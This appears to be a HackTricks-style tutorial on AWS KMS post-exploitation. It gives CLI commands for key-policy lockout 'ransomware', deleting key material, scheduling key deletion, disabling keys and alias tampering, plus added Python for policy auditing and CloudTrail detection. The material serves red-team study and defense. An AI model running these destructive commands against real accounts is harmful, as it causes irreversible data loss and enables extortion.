AWS - KMS Post Exploitation

Tip

Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

KMS

For more information check:

AWS - KMS Enum

Encrypt/Decrypt information

fileb:// and file:// are URI schemes used in AWS CLI commands to specify local file paths:

  • fileb://: Reads the file in binary mode, typically used for non-text files.
  • file://: Reads the file in text mode, normally used for plain text files, scripts, or JSON that have no special encoding requirements.

Tip

Note that if you want to decrypt data contained in a file, the file must contain the binary data, not base64-encoded data (fileb://).

  • Using a symmetric key
# Encrypt data
aws kms encrypt \
--key-id f0d3d719-b054-49ec-b515-4095b4777049 \
--plaintext fileb:///tmp/hello.txt \
--output text \
--query CiphertextBlob | base64 --decode > ExampleEncryptedFile

# Decrypt data
aws kms decrypt \
--ciphertext-blob fileb://ExampleEncryptedFile \
--key-id f0d3d719-b054-49ec-b515-4095b4777049 \
--output text \
--query Plaintext | base64 --decode
  • Using an asymmetric key:
# Encrypt data
aws kms encrypt \
--key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \
--encryption-algorithm RSAES_OAEP_SHA_256 \
--plaintext fileb:///tmp/hello.txt \
--output text \
--query CiphertextBlob | base64 --decode > ExampleEncryptedFile

# Decrypt data
aws kms decrypt \
--ciphertext-blob fileb://ExampleEncryptedFile \
--encryption-algorithm RSAES_OAEP_SHA_256 \
--key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \
--output text \
--query Plaintext | base64 --decode
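The base64 step in the pipelines above is exactly where the tip about fileb:// bites: the CLI prints CiphertextBlob as base64 text, and decrypt needs the decoded bytes. The following is an added example, not code from the original page: it performs the same text-to-binary conversion in Python and refuses a ciphertext file that still holds base64 text before it is handed to decrypt. The sample output it uses is constructed, not real KMS output.

```python
import base64
import binascii
import os
import tempfile

# Added example (not from the original page): mirrors the CLI pipeline
# `--output text --query CiphertextBlob | base64 --decode > file` and checks
# for the mistake the tip warns about (feeding fileb:// a file that is still
# base64 text instead of raw ciphertext).


def blob_from_cli_text(cli_text_output: str) -> bytes:
    """Decode the base64 text that `--output text --query CiphertextBlob` prints."""
    return base64.b64decode(cli_text_output.strip(), validate=True)


def looks_like_base64_text(data: bytes) -> bool:
    """True if the bytes are entirely base64-alphabet text that decodes cleanly.

    Raw KMS ciphertext is arbitrary binary and will practically never pass this,
    so a positive result means the decode step was skipped.
    """
    stripped = data.strip()
    if not stripped:
        return False
    try:
        base64.b64decode(stripped, validate=True)
    except (binascii.Error, ValueError):
        return False
    return True


def check_blob_bytes(data: bytes) -> bytes:
    """Return the data unchanged, or raise if it is still base64 text."""
    if looks_like_base64_text(data):
        raise ValueError("ciphertext is still base64 text; decode it before using fileb://")
    return data


def write_blob_for_fileb(cli_text_output: str, path: str) -> int:
    """Write the decoded ciphertext to `path` for use as `fileb://<path>`; returns byte count."""
    blob = blob_from_cli_text(cli_text_output)
    with open(path, "wb") as fh:
        fh.write(blob)
    return len(blob)


def check_blob_file(path: str) -> bytes:
    """Read a file destined for `--ciphertext-blob fileb://...` and validate it."""
    with open(path, "rb") as fh:
        return check_blob_bytes(fh.read())


if __name__ == "__main__":
    # Constructed sample: stands in for what the CLI prints; not real KMS output.
    fake_cli_output = base64.b64encode(b"\x00\xff" + os.urandom(62)).decode() + "\n"
    with tempfile.TemporaryDirectory() as tmp:
        good = os.path.join(tmp, "ExampleEncryptedFile")
        print("wrote", write_blob_for_fileb(fake_cli_output, good), "bytes")
        check_blob_file(good)  # passes: the file holds raw bytes
        bad = os.path.join(tmp, "StillBase64")
        with open(bad, "w") as fh:
            fh.write(fake_cli_output)  # the common mistake: base64 text on disk
        try:
            check_blob_file(bad)
        except ValueError as exc:
            print("rejected:", exc)
```

The check is a heuristic (a short binary blob could in principle happen to be valid base64), which is why it is applied to the file before the call rather than used to decide how to decode.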

KMS Ransomware

An attacker with full access to KMS could modify the key policy of the keys and grant his own account access over them, removing the access granted to the legitimate account.

Then, the users of the legitimate account won't be able to access any information of any service that was encrypted with those keys, creating a simple but effective ransomware against the account.

Warning

Note that AWS managed keys aren't affected by this attack; only Customer managed keys are.

Also note the need to use the --bypass-policy-lockout-safety-check param (the absence of this option in the web console makes this attack only possible from the CLI).

# Force policy change
aws kms put-key-policy --key-id mrk-c10357313a644d69b4b28b88523ef20c \
--policy-name default \
--policy file:///tmp/policy.yaml \
--bypass-policy-lockout-safety-check

{
  "Id": "key-consolepolicy-3",
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "Enable IAM User Permissions",
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::<your_own_account>:root"
      },
      "Action": "kms:*",
      "Resource": "*"
    }
  ]
}

Caution

Note that if you change that policy and only give access to an external account, and then from that external account you try to set a new policy to give the access back to the original account, you won't be able to, because the PutKeyPolicy action cannot be performed from a cross account.
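The lockout described above is precisely what the policy-lockout safety check exists to prevent, so a defender reviewing key policies (from a backup, a CloudTrail PutKeyPolicy record, or get-key-policy output) can ask the same question offline. The following is an added example, not code from the original page: it lists which accounts a key policy lets administer the key and reports whether the owning account has been locked out. The policy is the one shown on this page with the placeholder replaced by a made-up attacker account id; both account ids are constructed.

```python
import json
import re

# Added example (not from the original page): offline audit of a KMS key policy
# for the lockout pattern where every administrative Allow points at another
# account. Account ids below are constructed placeholders.

ACCOUNT_ARN_RE = re.compile(r"^arn:aws:iam::(\d{12}):")
ADMIN_ACTIONS = {"kms:*", "*", "kms:PutKeyPolicy"}


def principal_accounts(principal) -> set:
    """Return the 12-digit account ids named by a statement's Principal.

    Handles "*", a single ARN/account string, or a list under the "AWS" key.
    """
    if principal == "*":
        return {"*"}
    values = principal.get("AWS", []) if isinstance(principal, dict) else []
    if isinstance(values, str):
        values = [values]
    found = set()
    for value in values:
        if value == "*":
            found.add("*")
        elif re.fullmatch(r"\d{12}", value):
            found.add(value)
        else:
            match = ACCOUNT_ARN_RE.match(value)
            if match:
                found.add(match.group(1))
    return found


def grants_admin(actions) -> bool:
    """True if the Action element lets the principal rewrite the key policy."""
    if isinstance(actions, str):
        actions = [actions]
    return any(action in ADMIN_ACTIONS for action in actions)


def audit_key_policy(policy: dict, owner_account: str) -> dict:
    """Summarise who can administer the key and whether the owner is locked out."""
    owner_can_administer = False
    foreign_admins = set()
    for stmt in policy.get("Statement", []):
        if stmt.get("Effect") != "Allow" or "Principal" not in stmt:
            continue
        if not grants_admin(stmt.get("Action", [])):
            continue
        accounts = principal_accounts(stmt["Principal"])
        if owner_account in accounts or "*" in accounts:
            owner_can_administer = True
        foreign_admins |= {a for a in accounts if a not in (owner_account, "*")}
    return {
        "owner_can_administer": owner_can_administer,
        "foreign_admin_accounts": sorted(foreign_admins),
        "lockout": not owner_can_administer,
    }


# Constructed sample: the page's policy with 999999999999 as the attacker's
# account; 111111111111 plays the key's owning (victim) account.
ATTACKER_POLICY = json.loads("""
{
  "Id": "key-consolepolicy-3",
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "Enable IAM User Permissions",
      "Effect": "Allow",
      "Principal": {"AWS": "arn:aws:iam::999999999999:root"},
      "Action": "kms:*",
      "Resource": "*"
    }
  ]
}
""")

if __name__ == "__main__":
    print(json.dumps(audit_key_policy(ATTACKER_POLICY, "111111111111"), indent=2))
```

Run against a real policy, pass the account that owns the key as `owner_account`; a `lockout` of true together with a non-empty `foreign_admin_accounts` list is the ransomware shape, and since cross-account PutKeyPolicy is not possible, the only recovery path at that point is through AWS Support.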

Generic KMS Ransomware

There is another way to perform a global KMS Ransomware, which would involve the following steps:

  • Create a new key with key material imported by the attacker
  • Re-encrypt the victim's older data that was encrypted with the previous version using the new one
  • Delete the KMS key
  • Now only the attacker, who has the original key material, would be able to decrypt the encrypted data

Delete Keys via kms:DeleteImportedKeyMaterial

With the kms:DeleteImportedKeyMaterial permission, an actor can delete the imported key material from CMKs with Origin=EXTERNAL (CMKs that have imported their key material), making them unable to decrypt data. This action is destructive and irreversible unless compatible material is re-imported, allowing an attacker to effectively cause ransomware-like data loss by rendering encrypted information permanently inaccessible.

aws kms delete-imported-key-material --key-id <Key_ID>

Destroy keys

Destroying keys can cause a DoS.

# Schedule the destruction of a key (min wait time is 7 days)
aws kms schedule-key-deletion \
--key-id arn:aws:kms:us-west-2:123456789012:key/1234abcd-12ab-34cd-56ef-1234567890ab \
--pending-window-in-days 7

Caution

Note that AWS now prevents the previous actions from being performed from another account:

Change or delete Alias

This attack removes or redirects AWS KMS aliases, breaking key resolution and causing immediate failures for any service that depends on those aliases, resulting in a denial of service. With permissions like kms:DeleteAlias or kms:UpdateAlias, an attacker can remove or retarget an alias and break cryptographic operations (e.g., encrypt, describe). Any service that references the alias instead of the key ID can fail until the alias is restored or correctly fixed.

# Delete Alias
aws kms delete-alias --alias-name alias/<key_alias>

# Update Alias
aws kms update-alias \
--alias-name alias/<key_alias> \
--target-key-id <new_target_key>

Cancel Key Deletion

With permissions like kms:CancelKeyDeletion and kms:EnableKey, an actor can cancel the scheduled deletion of an AWS KMS customer master key and then re-enable it. This restores the key (initially in the Disabled state) and with it the ability to decrypt previously stored data, thus enabling exfiltration.

# First cancel the deletion
aws kms cancel-key-deletion \
--key-id <Key_ID>

# Second enable the key
aws kms enable-key \
--key-id <Key_ID>

Disable Key

With the kms:DisableKey permission, an actor can disable an AWS KMS customer master key (CMK), preventing it from being used for encryption or decryption.

This breaks access for any service that depends on that CMK and can cause immediate disruption or a denial of service until the key is re-enabled.

aws kms disable-key \
--key-id <key_id>

Derive Shared Secret

With the kms:DeriveSharedSecret permission, an actor can use a private key held in KMS together with a user-supplied public key to compute an ECDH shared secret.

aws kms derive-shared-secret \
--key-id <key_id> \
--public-key fileb:///<route_to_public_key> \
--key-agreement-algorithm <algorithm>

Impersonation via kms:Sign

With the kms:Sign permission, an actor can use a CMK stored in KMS to cryptographically sign data without exposing the private key, producing valid signatures that could enable impersonation or authorize malicious actions.

aws kms sign \
--key-id <key-id> \
--message fileb://<path-to-file> \
--signing-algorithm <algorithm> \
--message-type RAW

DoS with Custom Key Stores

With permissions like kms:DeleteCustomKeyStore, kms:DisconnectCustomKeyStore, or kms:UpdateCustomKeyStore, a user can modify, disconnect, or delete an AWS KMS Custom Key Store (CKS), rendering its backing keys unusable. This breaks encryption, decryption, and signing operations for all services that depend on those keys and can cause an immediate denial of service. Controlling and monitoring those permissions is important.

aws kms delete-custom-key-store --custom-key-store-id <CUSTOM_KEY_STORE_ID>

aws kms disconnect-custom-key-store --custom-key-store-id <CUSTOM_KEY_STORE_ID>

aws kms update-custom-key-store --custom-key-store-id <CUSTOM_KEY_STORE_ID> --new-custom-key-store-name <NEW_NAME> --key-store-password <NEW_PASSWORD>
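Every operation on this page (the policy lockout, the import-material ransomware sequence, scheduling key deletion, deleting imported material, alias tampering, cancelling a deletion and re-enabling a key, disabling a key, and the custom key store actions) is a management-plane KMS API call and therefore appears in CloudTrail. The following is an added example, not code from the original page: a small rule set that triages KMS CloudTrail records into findings, escalating PutKeyPolicy when the bypassPolicyLockoutSafetyCheck flag is set and marking callers whose account differs from the key's account. Field names follow the CloudTrail record format; the sample records are constructed, with the key ids taken from this page and the account ids made up.

```python
import json
from typing import Optional

# Added example (not from the original page): CloudTrail triage rules for the
# KMS operations discussed above. Records below are constructed samples.

# eventName -> (baseline severity, what it means for the key's consumers)
RULES = {
    "PutKeyPolicy": ("high", "key policy replaced"),
    "ScheduleKeyDeletion": ("critical", "key scheduled for deletion"),
    "DeleteImportedKeyMaterial": ("critical", "imported key material removed"),
    "DisableKey": ("high", "key disabled"),
    "DeleteAlias": ("high", "alias deleted"),
    "UpdateAlias": ("high", "alias retargeted"),
    "CancelKeyDeletion": ("medium", "pending key deletion cancelled"),
    "EnableKey": ("medium", "key re-enabled"),
    "DeleteCustomKeyStore": ("critical", "custom key store deleted"),
    "DisconnectCustomKeyStore": ("high", "custom key store disconnected"),
    "UpdateCustomKeyStore": ("medium", "custom key store reconfigured"),
    "CreateKey": ("info", "key created"),
}

SEVERITY_ORDER = {"critical": 0, "high": 1, "medium": 2, "info": 3}


def classify_event(event: dict) -> Optional[dict]:
    """Return a finding for a KMS CloudTrail record, or None if it is uninteresting."""
    if event.get("eventSource") != "kms.amazonaws.com":
        return None
    name = event.get("eventName", "")
    rule = RULES.get(name)
    if rule is None:
        return None
    severity, reason = rule
    params = event.get("requestParameters") or {}
    caller = (event.get("userIdentity") or {}).get("accountId")
    owner = event.get("recipientAccountId")
    notes = []
    # The lockout trick on this page requires the bypass flag; its presence is the tell.
    if name == "PutKeyPolicy" and params.get("bypassPolicyLockoutSafetyCheck") is True:
        severity, notes = "critical", ["policy lockout safety check bypassed"]
    # A key created with Origin=EXTERNAL is step one of the import-material
    # ransomware sequence: track it, but ordinary CreateKey calls are noise.
    if name == "CreateKey":
        if params.get("origin") != "EXTERNAL":
            return None
        severity, notes = "medium", ["key material will be imported by the caller"]
    if caller and owner and caller != owner:
        notes.append(f"cross-account caller {caller}")
    return {
        "time": event.get("eventTime"),
        "event": name,
        "severity": severity,
        "reason": reason,
        "target": params.get("keyId") or params.get("aliasName") or params.get("customKeyStoreId"),
        "caller": caller,
        "notes": notes,
    }


def scan(events: list) -> list:
    """Classify every record and return the findings, most severe first."""
    findings = [f for f in (classify_event(e) for e in events) if f]
    return sorted(findings, key=lambda f: SEVERITY_ORDER[f["severity"]])


# Constructed sample records, trimmed to the fields the rules use.
SAMPLE_EVENTS = [
    {"eventTime": "2024-01-01T10:00:00Z", "eventSource": "kms.amazonaws.com",
     "eventName": "PutKeyPolicy", "recipientAccountId": "111111111111",
     "userIdentity": {"accountId": "111111111111"},
     "requestParameters": {"keyId": "mrk-c10357313a644d69b4b28b88523ef20c",
                           "policyName": "default",
                           "bypassPolicyLockoutSafetyCheck": True}},
    {"eventTime": "2024-01-01T10:01:00Z", "eventSource": "kms.amazonaws.com",
     "eventName": "ScheduleKeyDeletion", "recipientAccountId": "111111111111",
     "userIdentity": {"accountId": "999999999999"},
     "requestParameters": {"keyId": "1234abcd-12ab-34cd-56ef-1234567890ab",
                           "pendingWindowInDays": 7}},
    {"eventTime": "2024-01-01T10:02:00Z", "eventSource": "kms.amazonaws.com",
     "eventName": "Decrypt", "recipientAccountId": "111111111111",
     "userIdentity": {"accountId": "111111111111"},
     "requestParameters": {"keyId": "1234abcd-12ab-34cd-56ef-1234567890ab"}},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(json.dumps(finding))
```

The severities are a starting point, not a standard: in an environment where keys are never deleted or aliases never moved outside change windows, every one of these events is worth a ticket, and the seven-day deletion window mentioned above is the time a defender has to act on a ScheduleKeyDeletion finding.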
